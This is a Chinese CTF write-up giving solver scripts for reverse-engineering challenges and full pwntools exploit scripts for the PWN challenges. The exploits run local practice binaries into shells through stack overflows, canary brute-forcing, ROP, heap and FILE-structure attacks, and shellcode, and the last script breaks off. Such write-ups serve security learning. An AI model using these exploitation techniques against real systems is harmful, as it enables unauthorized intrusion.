web RE PWN Crypto misc 新手 求帶
RE
fackre
這個題當時沒有做出來（去看牙了），最後復現出來了。
直接看腳本
from Crypto.Util.number import *
#import gmpy2
import binascii
import hashlib
# Byte-indexed substitution table recovered from the binary; re_table() below
# looks up each of the four bytes of its 32-bit argument in it.
lists=[0x1b,0x5d,0x42,0x2b,0xd,0x5,0x48,0xe6,0x35,0x16,0x9e,0xb5,0xbb,0xe3,0x24,0xf,0x13,0xc0,0x59,0x96,0x5a,0x12,0x2b,0xe0,0x8f,0x21,0x8c,0x52,0xde,0x92,0x12,0x84,0xa3,0xe2,0x6e,0x7b,0x76,0xa2,0xf,0x51,0x93,0xa9,0x78,0xab,0x5f,0x5e,0x16,0x82,0x72,0x82,0x26,0xd1,0x26,0xd4,0x9,0xbf,0x74,0xda,0xa7,0x3e,0x99,0x2,0x65,0xc3,0xb3,0xad,0xe0,0x5a,0xab,0x7a,0x83,0x93,0x3f,0xa4,0x11,0x3d,0x8e,0xd,0xdf,0x5a,0x71,0x8,0x3a,0xc8,0xf4,0x90,0x16,0x1b,0x88,0xc6,0x50,0x6f,0xd1,0xa4,0xb3,0x73,0x7b,0x82,0xbf,0xb2,0x5f,0x94,0xde,0xca,0x5a,0x5e,0xab,0x25,0xbe,0x8c,0x1b,0x80,0x65,0x9e,0xec,0x5a,0x37,0x2a,0x75,0x2c,0x2d,0xba,0x56,0xd0,0xba,0x3a,0xb6,0x94,0x81,0x70,0x87,0x75,0x3d,0x48,0x63,0x7d,0x52,0x81,0x39,0xb5,0x23,0xd4,0xd3,0xdd,0x4b,0xd9,0xb8,0x35,0xa3,0xca,0x40,0x77,0x52,0x7c,0x9e,0x6c,0x42,0xd8,0x53,0x6f,0xea,0x2e,0xc,0x9a,0xf3,0x2a,0x6a,0xd5,0xea,0x6b,0x93,0x2f,0x18,0x5c,0xbe,0x96,0xb4,0x26,0xf,0xdb,0x9f,0x7,0x30,0xaf,0x93,0x34,0x27,0x8e,0xa,0xca,0x53,0xb7,0xc9,0x8f,0x9b,0x40,0x87,0x54,0x50,0x53,0x1e,0x55,0x6,0x4,0x87,0xc9,0x5e,0x78,0xa0,0x3f,0x66,0x8,0xb0,0x9,0x6e,0x83,0xe5,0x6c,0x23,0xe6,0x74,0x83,0x1,0xa4,0x7f,0x62,0x39,0x9,0x94,0x32,0xd3,0x88,0x93,0x61,0xc2,0xc6,0x61,0x6b,0x28,0xc7,0x61,0xdd,0xdb,0x90,0xa9,0xd5,0xd8,0x8a,0xa4,0xa0,0x65,0xc1,0x35,0x41,0xba,0xcf,0x4a,0x47,0xca,0xaf,0x51,0xe1,0x72,0x5a,0xbf,0x1e,0xb3,0x7a,0x80,0xf2,0x7a,0xcb,0x25,0xe6,0x98,0x96,0x1b,0x53,0x44,0xd8,0x3c,0xac,0x12,0xb1,0x64,0x47,0x35]
def rol_4(value,count):
    """Rotate the low 32 bits of `value` left by `count` positions.

    `count` is taken modulo 32; the result is always masked to 32 bits.
    """
    width = 32
    shift = count % width
    # Bits that leave through the top re-enter at the bottom.
    carried = value >> (width - shift)
    rotated = (value << shift) | carried
    return rotated & 0xffffffff
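def ror_4(value,count):
    """Rotate the low 32 bits of `value` right by `count` positions.

    `count` is reduced modulo 32 first. The original wrote `count%nbits` as a
    bare expression (no assignment), so any count >= 32 produced a negative
    shift and a ValueError; `count %= nbits` is what was intended.
    """
    nbits = 32
    count %= nbits
    high = value >> count          # bits that fall off the right edge ...
    value <<= (nbits - count)      # ... re-enter at the top
    value |= high
    return value & 0xffffffff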
def re_table(a1):
    """Substitute each byte of the 32-bit word `a1` through `lists`, then mix
    the result with four fixed rotations (ror 6, ror 8, rol 10, rol 12) XORed
    together.
    """
    substituted = 0
    for shift in (0, 8, 16, 24):
        substituted |= lists[(a1 >> shift) & 0xff] << shift
    # XOR is associative, so the four rotations can be folded in any order.
    mixed = ror_4(substituted, 6)
    mixed ^= ror_4(substituted, 8)
    mixed ^= rol_4(substituted, 10)
    mixed ^= rol_4(substituted, 12)
    return mixed
# Starting values of the four 32-bit state words; the __main__ block below
# iterates the round function from them to recover the flag bytes.
a1=0xCC227F52
a2=0x5227AA48
a3=0x34725FD0
a4=0x0F276B39
if __name__ =="__main__":
    # Run the four-word round function 0x1d-4+1 (= 26) times, shifting the
    # new word in at the front exactly as the original did.
    state = [a1, a2, a3, a4]
    for _ in range(0x1d - 4 + 1):
        new_word = state[3] ^ re_table(state[0] ^ state[1] ^ state[2])
        state = [new_word, state[0], state[1], state[2]]
    a1, a2, a3, a4 = state
    # Serialise the words little-endian, a1 first, and wrap them as the flag.
    flag_s = b"".join(word.to_bytes(4, 'little') for word in (a1, a2, a3, a4))
    flag = "UNCTF{" + "".join(chr(byte) for byte in flag_s)
    flag_t = "-Wh4t_aB0ut_yoU233?}"
    flag += flag_t
    print(flag)
666:
就是一個簡單的異或加移位算法，逆推回去就可以了。
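# Recover each character from the compared string: XOR with `key`, then undo
# the per-position tweak (-6, +6, ^6 for the three characters of each group).
# `key` (0x12 == 18) doubles as the loop bound and equals len(cmpstr).
key = 0x12
cmpstr = 'izwhroz""w"v.K".Ni'
flag = ""
for i in range(0, key, 3):
    flag += chr((ord(cmpstr[i]) ^ key) - 6)
    flag += chr((ord(cmpstr[i + 1]) ^ key) + 6)
    flag += chr((ord(cmpstr[i + 2]) ^ key) ^ 6)
# print() works on Python 2 and 3 alike; the original `print flag` statement
# is a syntax error on Python 3.
print(flag)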
世界上最好的xor
動態調試一下就有 flag。
Checkhex
就是一個stringtohex。。。
Easy maze
一個簡單的maze 題目
地圖可以在動態調試時直接拿到，
然後一個簡單的 bfs 就可以拿到 flag。
#include<stdio.h>
#include<string.h>
#include<algorithm>
#include<vector>
#include<iostream>
#include<map>
#include<time.h>
#include<queue>
using namespace std;
// 7x7 maze map: pd() treats a 0 cell as blocked and anything else as walkable.
int s[7][7]={
    1,0,0,1,1,1,1,
    1,0,1,1,0,0,1,
    1,1,1,0,1,1,1,
    0,0,0,1,1,0,0,
    1,1,1,1,0,0,0,
    1,0,0,0,1,1,1,
    1,1,1,1,1,0,1,
};
// Per-direction steps: hh[i] is added to y, kk[i] to x (see slove()).
int hh[5]= {1,0,-1,0};//y
int kk[5]= {0,1,0,-1};//x
// Key emitted for direction i when it is taken.
char w[5]={'d','s','a','w'};
// Original note, translated: "O = left, o = right, 0 = down, . = up"
// (a legacy mapping; the characters actually printed are those in w[]).
bool vis[9][9];
// BFS node: current cell plus the key sequence that reached it.
struct code{
    int x,y;
    queue<char>l;
}as,ad;
// True when (i, j) lies inside the 7x7 map, has not been visited yet and is
// not a blocked (0) cell.
bool pd(int i,int j)
{
    bool inside = i >= 0 && i < 7 && j >= 0 && j < 7;
    if (!inside)
        return false;
    return !vis[i][j] && s[i][j] != 0;
}
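// Breadth-first search from (0,0) to (6,6). Prints the key sequence of the
// first path found (which BFS guarantees is a shortest one), followed by a
// newline, then returns. Fixes: the start cell is now marked visited, the
// search stops once the target is popped, and the output ends with '\n'.
void slove()
{
    memset(vis,0,sizeof(vis));
    queue<code>qq;
    as.x=0,as.y=0;
    while(!as.l.empty())
        as.l.pop();
    vis[as.x][as.y]=1;              // the original never marked (0,0)
    qq.push(as);
    while(!qq.empty())
    {
        ad=qq.front();
        qq.pop();
        if(ad.x==6&&ad.y==6)
        {
            while(!ad.l.empty())
            {
                printf("%c",ad.l.front());
                ad.l.pop();
            }
            printf("\n");
            return;                 // first hit is the shortest path
        }
        for(int i=0; i<4; i++)
        {
            as=ad;
            as.x=ad.x+kk[i];
            as.y=ad.y+hh[i];
            if(pd(as.x,as.y))
            {
                as.l.push(w[i]);
                qq.push(as);
                vis[as.x][as.y]=1;  // mark on push so a cell is queued once
            }
        }
    }
}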
int main()
{
    // Run the solver; reaching the end of main yields exit status 0.
    slove();
}
Easy vm
動態調試走幾遍就 ok 了，具體看腳本。
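# Bytes captured from the VM's check, in order.
ls = [
    0xF4, 0x0A, 0xF7, 0x64, 0x99, 0x78, 0x9E, 0x7D, 0xEA, 0x7B, 0x9E, 0x7B, 0x9F, 0x7E, 0xEB, 0x71,
    0xE8, 0x00, 0xE8, 0x07, 0x98, 0x19, 0xF4, 0x25, 0xF3, 0x21, 0xA4, 0x2F, 0xF4, 0x2F, 0xA6, 0x7C
]
# Recover each byte, last one first: XOR with 0xCD, XOR with the previous
# table byte (none for index 0), then add the index. `flag` is therefore
# built back-to-front and reversed when printed, as in the original.
flag = ""
for i in range(31, -1, -1):
    temp = ls[i] ^ 0xCD
    count = 0 if i == 0 else ls[i - 1]
    temp ^= count
    temp += i
    flag += chr(temp)
# print() is valid on Python 2 and 3; the original `print flag[::-1]` is not.
print(flag[::-1])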
Easy android
這個題目函數邏輯很清楚。
就是簡單的異或 然後對比md5值
去 md5 網站直接解不行，因爲這裏是可見字符異或一個字符串的內容之後才做 md5 的；
所以還是用 python 直接暴力可行，4 位一組，很好爆破。
#coding:utf-8
import hashlib
import string
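# bd1d6ba7f1d3f5a13ebb0a75844cccfa
# Per the notes above, the app XORs each 4-character chunk of the input with
# the matching chunk of `fake_str` and compares the md5 of the result with one
# of the digests below. The original repeated the same four nested loops once
# per chunk (kept as disabled string literals); crack_chunk() is that loop
# written once, with the digest, mask and alphabet as parameters.
fake_str='flag{this_is_a_fake_flag_ahhhhh}'
a = "2061e19de42da6e0de934592a2de3ca0"
b = "a81813dabd92cefdc6bbf28ea522d2d1"
c = "4b98921c9b772ed5971c9eca38b08c9f"
d = "81773872cbbd24dd8df2b980a2b47340"
e = "73b131aa8e4847d27a1c20608199814e"
f = "bbd7c4e20e99f0a3bf21c148fe22f21d"
gg = "bf268d46ef91eea2634c34db64c91ef2"
h = "0862deb943decbddb87dbf0eec3a06cc"
l=string.printable


def crack_chunk(target, mask, alphabet=string.printable):
    """Return every 4-character string over `alphabet` whose byte-wise XOR
    with the 4-character `mask` has md5 hex digest `target`.

    Args:
        target: lowercase md5 hex digest to match.
        mask: the four characters of `fake_str` this chunk is XORed with.
        alphabet: candidate characters; the default (string.printable, 100
            characters) means 10**8 md5 calls for a full chunk.

    Returns:
        List of matching 4-character candidates, in search order (empty when
        nothing matches).
    """
    hits = []
    mask_bytes = [ord(ch) for ch in mask]
    for i in alphabet:
        for j in alphabet:
            for k in alphabet:
                for g in alphabet:
                    candidate = i + j + k + g
                    # bytes() of the XORed code points is what the Python 2
                    # original fed to md5 as a str.
                    xored = bytes(ord(ch) ^ m for ch, m in zip(candidate, mask_bytes))
                    if hashlib.md5(xored).hexdigest() == target:
                        hits.append(candidate)
    return hits


if __name__ == "__main__":
    # Chunk n is masked by fake_str[4n:4n+4]; the original hard-coded the
    # first ('flag') and last two ('_ahh', 'hhh}') masks by hand.
    for stage, target in enumerate([a, b, c, d, e, f, gg, h]):
        print("[*]%d" % (stage + 1))
        mask = fake_str[stage * 4:stage * 4 + 4]
        for hit in crack_chunk(target, mask, l):
            print(hit)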
奇妙的RTF
這個題目有提示
Office 2017 年的某個 CVE，百度一下就知道是哪個。
So 找到點
拿到flag
沒事 不難
這個題目 有個坑點 就是 要找到程序真正的計算的地方。
裏面是一個有點難搞的算法
寫一個腳本 搞出來就可以了
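flag = ""
l = [0x0B3, 0x9C, 0x0B7, 0x0BF, 0x0B2, 0x0CB, 0x0D3, 0x0BF, 0x0B2, 0x0CB, 0x0D3, 0x0C9, 0x0B1, 0xcb, 0x0D3, 0x0BB, 0x0AE, 0x0AD, 0x0A3, 0x0CF, 0x0AD, 0x0CD, 0x9F, 0x0BB]
# Each table entry minus 0x96 is a 6-bit value; four of them form 24 bits
# that split into three 8-bit characters. This is the same bit order the
# original reconstructed one bit at a time (it also only ever kept six bits
# per entry, hence the & 0x3f). The original's `print len(s)` debug output
# is dropped; `//`-free bit arithmetic keeps it correct on Python 3 as well.
for i in range(6):
    v0, v1, v2, v3 = ((entry - 0x96) & 0x3f for entry in l[i * 4:i * 4 + 4])
    word = (v0 << 18) | (v1 << 12) | (v2 << 6) | v3
    flag += chr((word >> 16) & 0xff)
    flag += chr((word >> 8) & 0xff)
    flag += chr(word & 0xff)
print(flag)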
PWN:
Soso easy pwn
直接棧溢出就可以，只不過需要爆破一位，有 16 分之 1 的機率。
# -*- coding: utf-8 -*-
from pwn import *
context.log_level='debug'   # pwntools: log every byte sent and received
if __name__ =="__main__":
    # Retry loop for the 1-in-16 guess described above: the unknown nibble is
    # fixed to 'a'; a wrong guess ends in EOFError, so the process is closed
    # and a fresh one started. Note the loop never breaks after interactive().
    while True :
        try:
            io=process('./pwn')
            elf=ELF('./pwn')   # loaded but not referenced below
            io.recv(16)
            addr=int(io.recv(5))   # five characters parsed as a decimal number
            #print hex(addr)
            back_door=int(hex(addr)+'a'+'9cd',16)
            log.success("back_door "+hex(back_door))
            payload='a'*0xc+p32(back_door)
            io.send(payload)
            sleep(0.1)
            io.recv()
            io.sendline('0')
            io.recv()
            #io.recv()
        except EOFError:
            io.close()
        else:
            io.interactive()
Orw:
Orw的題目。。
# -*- coding: utf-8 -*-
from pwn import *
context.log_level='debug'   # pwntools: log every byte sent and received
def add(size,content):
    """Menu option 1: request `size` bytes and send `content` for them."""
    io.sendlineafter("Your Choice: ", '1')
    io.sendlineafter("size: ", str(size))
    io.sendlineafter("content: ", content)
def delete(index):
    """Menu option 2: free the entry at `index`."""
    io.sendlineafter("Your Choice: ", '2')
    io.sendlineafter("idx: ", str(index))
def edit(index,content):
    """Menu option 3: select entry `index` and send `content` as its new data."""
    io.sendlineafter("Your Choice: ", '3')
    io.sendlineafter("idx: ", str(index))
    io.sendlineafter("content: ", content)
#io=remote('101.71.29.5',10005)
#libc=ELF('./x64_libc.so.6')
if __name__ =="__main__":
    # Scripted interaction with the local challenge binary through the
    # add/delete/edit helpers above. The original's inline comments
    # (#fastbinattack, gadget annotations) mark the stages; every libc offset
    # below belongs to the libc-2.23 build loaded here.
    io=process('./pwn_heap')
    elf=ELF('./pwn_heap')   # loaded but not referenced below
    libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
    add(0x68,'')
    add(0x78,'')
    add(0x68,(p64(0)+p64(0x21))*6+'')
    add(0x68,(p64(0)+p64(0x21))*6+'')
    delete(0)
    io.sendlineafter('Your Choice: ','1')
    io.sendlineafter('size: ',str(0x68))
    io.sendafter('content: ','a' * 0x60 + p64(0) + p8(0xf1))
    delete(1)
    delete(2)
    add(0x78,'')
    delete(0)
    add(0x68,'a'*0x60+p64(0)+p8(0xa1))
    delete(1)
    add(0x98,'')
    edit(1,'b'*0x70+p64(0)+p64(0x71)+p16(0x55dd))
    add(0x68,'')
    add(0x68,'c'*0x33+p64(0xfbad2887|0x1000)+p64(0)*3)
    # Leak stage: the libc base is derived from the _IO_2_1_stdin_ address
    # found in the data read back here.
    data=io.recvuntil('\xff\xff\xff\xff\xff\xff\xff\xff')
    address=u64(data[0x88:0x90])
    libc_addr=address-libc.symbols['_IO_2_1_stdin_']
    success('libc_base:'+hex(libc_addr))
    pause()   # pwntools: wait for a keypress (handy for attaching a debugger)
    edit(1,'b'*0x70+p64(0)+p64(0x91))
    delete(2)
    edit(1,'b'*0x70+p64(0)+p64(0x91)+p64(0)+p64(libc_addr+libc.symbols['__free_hook']-0x20))
    add(0x88,'')
    #fastbinattack
    edit(1,'b'*0x70+p64(0)+p64(0x71))
    delete(2)
    edit(1,'b'*0x70+p64(0)+p64(0x71)+p64(libc_addr+libc.symbols['__free_hook']-0x13))
    # SigreturnFrame: register values for the gadget at frame.rip; rsp is
    # pointed at the page-aligned address that also receives `layout` below.
    frame=SigreturnFrame()
    frame.rdi=0
    frame.rsi=(libc_addr+libc.symbols['__free_hook'])&0xfffffffffffff000#
    frame.rdx=0x2000
    frame.rsp=(libc_addr+libc.symbols['__free_hook'])&0xfffffffffffff000
    frame.rip=libc_addr+0x00000000000bc375#:syscall;ret;-->rcx
    payload=str(frame)
    add(0x68,payload[0x80:0x80+0x60])
    add(0x68,'fff'+p64(libc_addr+libc.symbols['setcontext']+53))
    edit(1,payload[:0x98])
    delete(1)
    # Gadget chain (offsets annotated by the original), sent together with
    # the shellcode in the single io.send() below.
    layout=[
        libc_addr+0x0000000000021102,#:poprdi;ret;
        (libc_addr+libc.symbols['__free_hook'])&0xfffffffffffff000,
        libc_addr+0x00000000000202e8,#:poprsi;ret;
        0x2000,
        libc_addr+0x0000000000001b92,#:poprdx;ret;
        7,
        libc_addr+0x0000000000033544,#:poprax;ret;
        10,
        libc_addr+0x00000000000bc375,#:syscall;ret;
        libc_addr+0x0000000000002a71,#:jmprsp;
    ]
    # Shellcode: the open/read/write sequence the challenge title refers to,
    # with a "fail" message on the error path, then exit.
    shellcode=asm('''
    sub rsp, 0x800
    push 0x67616c66
    mov rdi, rsp
    xor esi, esi
    mov eax, 2
    syscall
    cmp eax, 0
    js failed
    mov edi, eax
    mov rsi, rsp
    mov edx, 0x100
    xor eax, eax
    syscall
    mov edx, eax
    mov rsi, rsp
    mov edi, 1
    mov eax, edi
    syscall
    jmp exit
    failed:
    push 0x6c696166
    mov edi, 1
    mov rsi, rsp
    mov edx, 4
    mov eax, edi
    syscall
    exit:
    xor edi, edi
    mov eax, 231
    syscall
    ''')
    io.send(flat(layout)+shellcode)
    #pause()
    '''
    io.sendline("1")
    io.sendline("1")'''
    io.interactive()
Driver
堆重疊+unlink
from pwn import*
context.log_level='debug'   # pwntools: log every byte sent and received
context.arch='amd64'        # 64-bit target for the pwntools helpers
def buy(choice,name):
    """Menu option 1: pick sub-choice `choice` and send `name` for it."""
    io.sendlineafter('Your Choice>> \n', '1')
    io.sendlineafter('Your Choice>> \n', str(choice))
    io.sendlineafter('name: ', name)
def dele(index):
    """Menu option 3: remove the entry at `index`."""
    io.sendlineafter('Your Choice>> \n', '3')
    io.sendlineafter('index: ', str(index))
def edit(index,name):
    """Menu option 4: select `index` and send `name` without a trailing newline."""
    io.sendlineafter('Your Choice>> \n', '4')
    io.sendlineafter('index: ', str(index))
    io.sendafter('name: ', name)
def edit1(index,name):
    """Menu option 6: like edit(), but through the second edit entry point."""
    io.sendlineafter('Your Choice>> \n', '6')
    io.sendlineafter('index: ', str(index))
    io.sendafter('name: ', name)
def drive(index,con):
    """Menu option 5, sub-option 1: select `index`, then answer the next
    prompt with `con`."""
    io.sendlineafter('Your Choice>> \n', '5')
    io.sendlineafter('index: ', str(index))
    io.recv()
    io.sendline('1')
    io.sendlineafter('Your Choice>> \n', str(con))
def drive1(index):
    """Menu option 5, sub-option 2: select `index` and take the second branch."""
    io.sendlineafter('Your Choice>> \n', '5')
    io.sendlineafter('index: ', str(index))
    io.recv()
    io.sendline('2')
# Module-level handles: the helpers above use `io`; `elf` is not referenced
# below; `libc` supplies the symbol offsets for the 2.23 build.
io=process('./driver')
elf=ELF('./driver')
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
if __name__ =="__main__":
    # Scripted interaction via the menu helpers above (the note above sums it
    # up as heap overlap plus unlink). Sizes and offsets are specific to the
    # local binary and the libc-2.23 loaded above.
    io.recvuntil('Your Choice>> \n')
    io.sendline('8')
    io.recv(8)
    heap_addr=int(io.recv(12),16)-0x10   # menu 8 evidently prints a hex address
    success('heap_addr:'+hex(heap_addr))
    buy(2,'a')
    buy(2,'a')
    dele(0)
    buy(1,'a')
    buy(2,'a')
    dele(0)
    dele(2)
    dele(1)
    buy(2,'a')
    buy(1,'a')
    drive(1,2)
    # Python 2 integer division; on Python 3 `/` would yield a float here.
    malloc_hook_addr=int(io.recvuntil("Km")[:-2])/2-88-0x10
    libc_base=malloc_hook_addr-libc.sym['__malloc_hook']
    success('libc_base '+hex(libc_base))
    buy(2,'a')
    dele(0)
    dele(1)
    dele(2)
    buy(2,'a')
    buy(2,'a')
    buy(3,'a'*0x1f0+p64(0x200)+p64(0x31))
    edit(1,'a'*0xf0+p64(0x330))
    dele(0)
    dele(2)
    buy(3,'\x00'*0xf8+p64(0x21)+p64(0xc8)+p64(1)+p64(0)+p64(0xf8)+p64(0)+p64(heap_addr+0x10))
    dele(1)
    buy(1,'a')
    dele(0)
    buy(3,'\x00'*0xf8+p64(0x21)+p64(heap_addr)+'\x00'*0x30+p64(0x41)+p64(0x100)+'\x00'*0x10+p64(0x220)+p64(0)+p64(heap_addr+0x30)+p64(0)+p64(0x21)+'\x00'*0x68+p64(0x41)+p64(0x64)+p64(0)+p64(0)+p64(0x68)+p64(0)+p64(heap_addr+0x10)[:-2])
    dele(1)
    buy(1,'1')
    edit1(0,'\x00'*0xf8+p64(0x21)+p64(heap_addr)+'\x00'*0x70+p64(0x21)+'\x00'*0x68+p64(0x41)+p64(0x64)+p64(0)+p64(0)+p64(0x68)+p64(0)+p64(libc_base+libc.sym['__malloc_hook']))
    edit1(1,p64(libc_base+0x4526a))   # libc-2.23 offset chosen by the original
    io.sendline("1")
    sleep(0.5)
    io.sendline("1")
    io.interactive()
Shellcode
這題就體驗到了谷歌等搜索引擎的搜索能力，
找到一個符合條件的 64 位 shellcode 是多麼不容易，
import io
from pwn import*
context.log_level='debug'   # pwntools: log every byte sent and received
context.arch='amd64'        # 64-bit target for the pwntools helpers
# NOTE: this `io` shadows the stdlib `io` module imported at the top of the
# script; that import is otherwise unused here.
io=process('./shellcode')
elf=ELF('./shellcode')      # loaded but not referenced below
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
if __name__ =="__main__":
    io.recv()
    # Alphanumeric payload found by searching, as the note above explains; the
    # trailing comment is the author's own annotation of the bytes it stands for.
    io.sendline('Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M154J0S0X2K0W1M0D7p0F0z3V110b154y33164F0Z0D0h0u063O3f0y4y4D1k110n0H3c7l045O3f2n4y5L0Z0E0o3q3X0z0506')#\x0f\x05
    io.interactive()
Babyrop
就。。。很簡單的rop題目
from pwn import*
context.log_level='debug'   # pwntools: log every byte sent and received
# 32-bit target: the i386 libc supplies the symbol offsets used below.
io=process('./babyrop')
elf=ELF('./babyrop')
libc=ELF('/lib/i386-linux-gnu/libc-2.23.so')
if __name__ =="__main__":
    io.recvuntil("Hello CTFer!")
    # 0x20 bytes of filler, then presumably the value the first check
    # compares against — confirm in the binary.
    payload='a'*0x20+p32(0x66666666)
    main_addr=0x08048592
    io.sendline(payload)
    io.recvuntil("What is your name?")
    # Stage 1: call puts on its own GOT entry and return to main, so the
    # printed address gives the libc base.
    io.sendline('a'*0x14+p32(elf.plt['puts'])+p32(main_addr)+p32(elf.got['puts']))
    io.recv()
    libc_base=u32(io.recv()[:4])-libc.sym['puts']
    success('libc_base:'+hex(libc_base))
    io.sendline(payload)
    io.recv()
    # Stage 2: system("/bin/sh"). `.next()` is the Python 2 iterator API.
    bin_sh_addr=libc_base+libc.search("/bin/sh").next()
    io.sendline('a'*0x14+p32(0x0804839e)+p32(libc_base+libc.sym['system'])+p32(main_addr)+p32(bin_sh_addr))
    io.interactive()
easy_stack
這個題目給了四次的機會，然後因爲 32 位的 canary 最低位是 0x00，
所以我們只需要爆破三個字節，最後一次直接 getshell 就 ok 了。
from pwn import*
context.log_level='debug'   # pwntools: log every byte sent and received
if __name__ =="__main__":
    io=process('./easystack')
    elf=ELF('./easystack')
    libc=ELF('/lib/i386-linux-gnu/libc-2.23.so')
    # Rounds 1-3 recover the canary one byte at a time (its low byte is 0x00
    # on 32-bit, see the note above). Each round asks for 301 numbers: 255
    # guesses for the byte, 44 copies of a mask, then '0' to stop; the
    # 3-digit reply is decoded into the byte below. Why that arithmetic
    # works depends on the binary's counting logic, which is not visible here.
    io.recvuntil("How much do you want to calc: ")
    io.sendline('301')
    for i in range(1,256):
        io.recvuntil("num?(Input 0 to stop): ")
        io.sendline(str(i*0x1000000))
    for i in range(44):
        io.recvuntil("num?(Input 0 to stop): ")
        io.sendline(str(0xff000000))
    io.recv()
    io.sendline('0')
    io.recv(10)
    canary =(255-(int(io.recv(3))-299-44))<<24
    io.recv()
    io.sendline('n')
    # Round 2: byte 2, with the recovered byte 3 folded into every guess.
    io.recvuntil("How much do you want to calc: ")
    io.sendline('301')
    for i in range(1,256):
        io.recvuntil("num?(Input 0 to stop): ")
        io.sendline(str((i<<16)+canary))
        #io.sendlineafter('num?(Input 0 to stop): ',str((i<<16)+canary))
    for i in range(44):
        io.recvuntil("num?(Input 0 to stop): ")
        io.sendline(str(0xffff0000))
        #io.sendlineafter('num?(Input 0 to stop): ',str(0xffff0000))
    io.recv()
    io.sendline('0')
    io.recv(10)
    canary+=(255-(int(io.recv(3))-299-44))<<16
    io.recv()
    io.sendline('n')
    # Round 3: byte 1.
    io.recvuntil("How much do you want to calc: ")
    io.sendline('301')
    for i in range(1,256):
        io.recvuntil("num?(Input 0 to stop): ")
        io.sendline(str((i<<8)+canary))
    for i in range(44):
        io.recvuntil("num?(Input 0 to stop): ")
        io.sendline(str(0xffffff00))
    io.recv()
    io.sendline('0')
    io.recv(10)
    canary+=(255-(int(io.recv(3))-299-44))<<8
    #print hex(canary)
    #pause()
    io.recv()
    # Fixed addresses from the (non-PIE) binary used by the leak round.
    stream_addr=0x08048750
    cout_addr=0x0804A0C0
    main_addr=0x080488E7
    io.sendline('n')
    # Round 4 (leak): 300 fillers, the canary, 3 more fillers, then the
    # return chain that prints setbuf's GOT entry and returns to main; the
    # 4 bytes read back give the libc base.
    io.recvuntil("How much do you want to calc: ")
    io.sendline('320')
    for i in range(300):
        io.recvuntil("num?(Input 0 to stop): ")
        io.sendline('1')
    io.recvuntil("num?(Input 0 to stop): ")
    io.sendline(str(canary))
    for i in range(3):
        io.recvuntil("num?(Input 0 to stop): ")
        io.sendline('1')
    io.recvuntil("num?(Input 0 to stop): ")
    io.sendline(str(stream_addr))
    io.recvuntil("num?(Input 0 to stop): ")
    io.sendline(str(main_addr))
    io.recvuntil("num?(Input 0 to stop): ")
    io.sendline(str(cout_addr))
    io.recvuntil("num?(Input 0 to stop): ")
    io.sendline(str(elf.got['setbuf']))
    io.recvuntil("num?(Input 0 to stop): ")
    io.sendline('0')
    io.recv(10)
    io.recv(3)
    io.sendline('n')
    io.recv()
    libc_base=u32(io.recv(4))-libc.sym['setbuf']
    log.success("libc_base "+hex(libc_base))
    pause()   # pwntools: wait for a keypress
    # Round 5: same layout, with system("/bin/sh") in place of the leak chain.
    # Note this round reads with recv(timeout=0.1) where the others used
    # recvuntil(), so prompt handling differs slightly.
    io.sendline('320')
    for i in range(300):
        io.recvuntil("num?(Input 0 to stop): ")
        io.sendline('1')
    io.recv(timeout=0.1)
    io.sendline(str(canary))
    for i in range(3):
        io.recvuntil("num?(Input 0 to stop): ")
        io.sendline('1')
    bin_sh_addr=libc_base+libc.search("/bin/sh").next()   # Python 2 iterator API
    system_addr=libc_base+libc.sym['system']
    io.recvuntil("num?(Input 0 to stop): ")
    io.sendline(str(system_addr))
    io.recvuntil("num?(Input 0 to stop): ")
    io.sendline(str(1))
    io.recvuntil("num?(Input 0 to stop): ")
    io.sendline(str(bin_sh_addr))
    io.recvuntil("num?(Input 0 to stop): ")
    io.sendline(str(0))
    pause()
    io.interactive()
Box 有一個任意修改的指針 直接修改io file
from pwn import*
context.log_level='debug'   # pwntools: log every byte sent and received
context.arch='amd64'        # 64-bit target for the pwntools helpers
def add(ids,size):
    """Menu option 1: create box `ids` with `size` bytes."""
    io.sendlineafter('Your Choice: ', '1')
    io.sendlineafter('Box ID: ', str(ids))
    io.sendlineafter('Size: ', str(size))
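def edit(ids,con):
    """Menu option 2: select box `ids` and send `con` as its content.

    Fixed: the original wrote `io,sendline(str(ids))` — a tuple expression,
    not a method call — which raises NameError before the ID is ever sent.
    """
    io.recvuntil('Your Choice: ')
    io.sendline('2')
    io.recvuntil('Box ID: ')
    io.sendline(str(ids))
    io.recvuntil('Box Content: ')
    io.send(con)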
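def dele(ids):
    """Menu option 3: delete box `ids`.

    Fixed: the original wrote `io,sendline(str(ids))` — a tuple expression,
    not a method call — which raises NameError before the ID is ever sent.
    """
    io.recvuntil('Your Choice: ')
    io.sendline('3')
    io.recvuntil('Box ID: ')
    io.sendline(str(ids))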
if __name__ =="__main__":
    io=process('./Box')
    elf=ELF('./Box')   # loaded but not referenced below
    libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
    # Negative box IDs are the "arbitrary modify" pointer the note above
    # refers to; which structures -27/-12/-10 reach is specific to the binary.
    edit(-27,'\x90')
    edit(-27,p64(0x88))
    edit(-12,p64(0x1800)+p64(0)*3+'\x88')
    # The 8 bytes read back contain a _IO_2_1_stdin_ address ->
    # libc base.
    libc_base=u64(io.recv(8))-libc.sym['_IO_2_1_stdin_']
    success('libc_base:'+hex(libc_base))
    edit(-27,p64(libc_base+libc.sym['__free_hook'])+p64(0x68))
    edit(-10,p64(libc_base+0x4526a))   # libc-2.23 offset chosen by the original
    add(0,0x68)
    dele(0)
    io.interactive()
Babyheap
from pwn import*
context.log_level='debug'   # pwntools: log every byte sent and received
def add(content):
    """Menu option 1: create an entry holding `content`."""
    io.sendlineafter("Your choice: ", '1')
    io.sendlineafter('content: ', content)
def dele(index):
    """Menu option 4: delete the entry at `index`."""
    io.sendlineafter("Your choice: ", '4')
    io.sendlineafter("index: ", str(index))
def edit(index,size,content):
    """Menu option 2: rewrite entry `index` with `size` bytes of `content`."""
    io.sendlineafter("Your choice: ", '2')
    io.sendlineafter("index: ", str(index))
    io.sendlineafter('size: ', str(size))
    io.sendlineafter('content: ', content)
def show(index):
    """Menu option 3: print the entry at `index`."""
    io.sendlineafter("Your choice: ", '3')
    io.sendlineafter("index: ", str(index))
if __name__ =="__main__":
    io=process('./baby_heap')
    elf=ELF('./baby_heap')   # loaded but not referenced below
    libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
    add('a'*0x10)
